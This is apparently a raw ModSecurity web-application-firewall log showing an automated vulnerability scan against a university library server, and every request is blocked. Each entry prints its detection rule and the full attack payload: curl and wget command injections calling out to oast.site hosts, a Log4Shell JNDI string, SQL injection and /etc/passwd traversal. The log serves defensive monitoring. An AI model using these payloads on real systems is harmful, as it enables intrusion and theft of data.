"OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/hms/user-login.php"] [unique_id "ZO10gMCo-f0AAAPOhcYAAAAa"]
[Tue Aug 29 11:30:56.331770 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.fun/ found within TX:1: oast.fun/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/getFavicon"] [unique_id "ZO10gMCo-f0AAAN@5BIAAAAO"]
[Tue Aug 29 11:30:58.380570 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:price_max. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:price_max: 1.0 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)''"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/upload/mobile/index.php"] [unique_id "ZO10gsCo-f0AAAN@5BwAAAAO"]
[Tue Aug 29 11:30:58.544208 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: *\\x22;/ found within ARGS:type: *\\x22;/root/kerbynet.cgi/scripts/getkey ../../../etc/passwd;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10gsCo-f0AAAPDn3YAAAAP"]
[Tue Aug 29 11:30:59.412042 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:password: password$(curl cjmn8l5jmimk2adbbnlgzf79hiij5p779.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/forms/doLogin"] [unique_id "ZO10g8Co-f0AAAPPS0UAAAAd"]
[Tue Aug 29 11:30:59.548938 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22; ?> found within ARGS:content: <?php echo \\x222UdxkGgdPPx7K5xqPocLkjZLXv2\\x22; ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/file-manager/backend/text"] [unique_id "ZO10g8Co-f0AAAPRNfEAAAAf"]
[Tue Aug 29 11:31:03.495116 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:Event. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:Event: `curl http:/cjmn8l5jmimk2adbbnlgzttworcyeksf5.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/include/makecvs.php"] [unique_id "ZO10h8Co-f0AAAP5mGcAAAAM"]
[Tue Aug 29 11:31:03.812364 2023] [:error] [pid 1021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:post_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:post_ids: 0) union select md5(999999999),null,null -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO10h8Co-f0AAAP9He4AAAAW"]
[Tue Aug 29 11:31:04.705415 2023] [:error] [pid 1023] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgm4a94b84boiwa.oast.site#.salesforce.com/ found within TX:1: cjmn8l5jmimk2adbbnlgm4a94b84boiwa.oast.site#.salesforce.com/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/service/error/sfdc_preauth.jsp"] [unique_id "ZO10iMCo-f0AAAP-LMQAAAAe"]
[Tue Aug 29 11:31:04.712240 2023] [:error] [pid 1016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:path: `curl http:/cjmn8l5jmimk2adbbnlgxwzp6cupq9kh5.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/tos/index.php"] [unique_id "ZO10iMCo-f0AAAP4H98AAAAI"]
[Tue Aug 29 11:31:05.020164 2023] [:error] [pid 1026] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:user_login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:user_login: ' AND (SELECT 8149 FROM (SELECT(SLEEP(3)))NuqO) AND 'YvuB'='YvuB"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-json/pie/v1/login"] [unique_id "ZO10icCo-f0AAAQCvzAAAAAk"]
[Tue Aug 29 11:31:05.724132 2023] [:error] [pid 1032] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:user: a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null..."] [severity " [hostname "digilibfh.unla.ac.id"] [uri "/api.php"] [unique_id "ZO10icCo-f0AAAQIS6kAAAAq"]
[Tue Aug 29 11:31:06.318614 2023] [:error] [pid 1021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/sysShell"] [unique_id "ZO10isCo-f0AAAP9HgMAAAAW"]
[Tue Aug 29 11:31:06.331549 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../../../../../../../../ found within ARGS:controller: ./../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10isCo-f0AAAQSWJQAAAA0"]
[Tue Aug 29 11:31:07.314298 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:handle: com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cjmn8l5jmimk2adbbnlgy1ckooyz79uzo.oast.site')"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO10i8Co-f0AAAQKOZwAAAAs"]
[Tue Aug 29 11:31:08.307597 2023] [:error] [pid 1015] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../..////////// found within ARGS:lang: /../../../..//////////dev/cmdb/sslvpn_websession"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/remote/fgt_lang"] [unique_id "ZO10jMCo-f0AAAP3OmIAAAAH"]
[Tue Aug 29 11:31:09.088297 2023] [:error] [pid 1026] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:timezone: 1;wget http:/cjmn8l5jmimk2adbbnlgfnibr1rdq7fse.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/upload"] [unique_id "ZO10jcCo-f0AAAQCvzcAAAAk"]
[Tue Aug 29 11:31:10.328413 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:dir: 'Pa_Noteexpr curl+cjmn8l5jmimk2adbbnlgubtzh7xeyoh84.oast.sitePa_Note'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/file_transfer.cgi"] [unique_id "ZO10jsCo-f0AAAP05JgAAAAA"]
[Tue Aug 29 11:31:10.347708 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:param: action=sql sql='select md5(999999999)'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10jsCo-f0AAAPDn4UAAAAP"]
[Tue Aug 29 11:31:10.359556 2023] [:error] [pid 1021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/pages/systemcall.php"] [unique_id "ZO10jsCo-f0AAAP9HgwAAAAW"]
[Tue Aug 29 11:31:11.304207 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nodeId[nodeid]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',@@ found within ARGS:nodeId[nodeid]: 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version),19,20,21,22,23,24,25,26,27-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/ajax/api/content_infraction/getIndexableContent"] [unique_id "ZO10j8Co-f0AAAPDn4cAAAAP"]
[Tue Aug 29 11:31:11.974835 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlgss1o7xehmw561.oast.site;`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10j8Co-f0AAAQEGGEAAAAm"]
[Tue Aug 29 11:31:13.303417 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{"params":"w. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22| found within ARGS:{\\x22params\\x22:\\x22w: 123\\x5c\\x22'1234123'\\x5c\\x22|cat /etc/passwd\\x22}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/api/edr/sangforinter/v2/cssp/slog_client"] [unique_id "ZO10kcCo-f0AAAP@Mw0AAAAZ"]
[Tue Aug 29 11:31:13.320556 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-831}${:-468}.${hostName}.username.cjmn8l5jmimk2adbbnlg9db5qkpzc5dwf.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/ccmadmin/j_security_check"] [unique_id "ZO10kcCo-f0AAAQOv0AAAAAw"]
[Tue Aug 29 11:31:13.433884 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://0.0.0.0 found within ARGS:url: http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/premise/front/getPingData"] [unique_id "ZO10kcCo-f0AAAQSWKUAAAA0"]
[Tue Aug 29 11:31:14.325739 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../ found within ARGS:path: /../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php/admin/filemanager/sa/getZipFile"] [unique_id "ZO10ksCo-f0AAAQQyjEAAAAy"]
[Tue Aug 29 11:31:14.344406 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()))))-- - found within ARGS:id: 1' and extractvalue(0x0a,concat(0x0a,(select concat_ws(0x207c20,md5(999999999),1,user()))))-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO10ksCo-f0AAAPDn5AAAAAP"]
[Tue Aug 29 11:31:15.417057 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:question_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:question_id: 1 AND (SELECT 7242 FROM (SELECT(SLEEP(4)))HQYx)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10k8Co-f0AAAQQyjMAAAAy"]
[Tue Aug 29 11:31:16.759557 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:del. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:del: 123456 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/cms_channel.php"] [unique_id "ZO10lMCo-f0AAAP5mHYAAAAM"]
[Tue Aug 29 11:31:17.324324 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO10lcCo-f0AAAQDFSUAAAAl"]
[Tue Aug 29 11:31:17.339568 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO10lcCo-f0AAAQA-8cAAAAi"]
[Tue Aug 29 11:31:17.344226 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lib_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lib_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10lcCo-f0AAAP05KYAAAAA"]
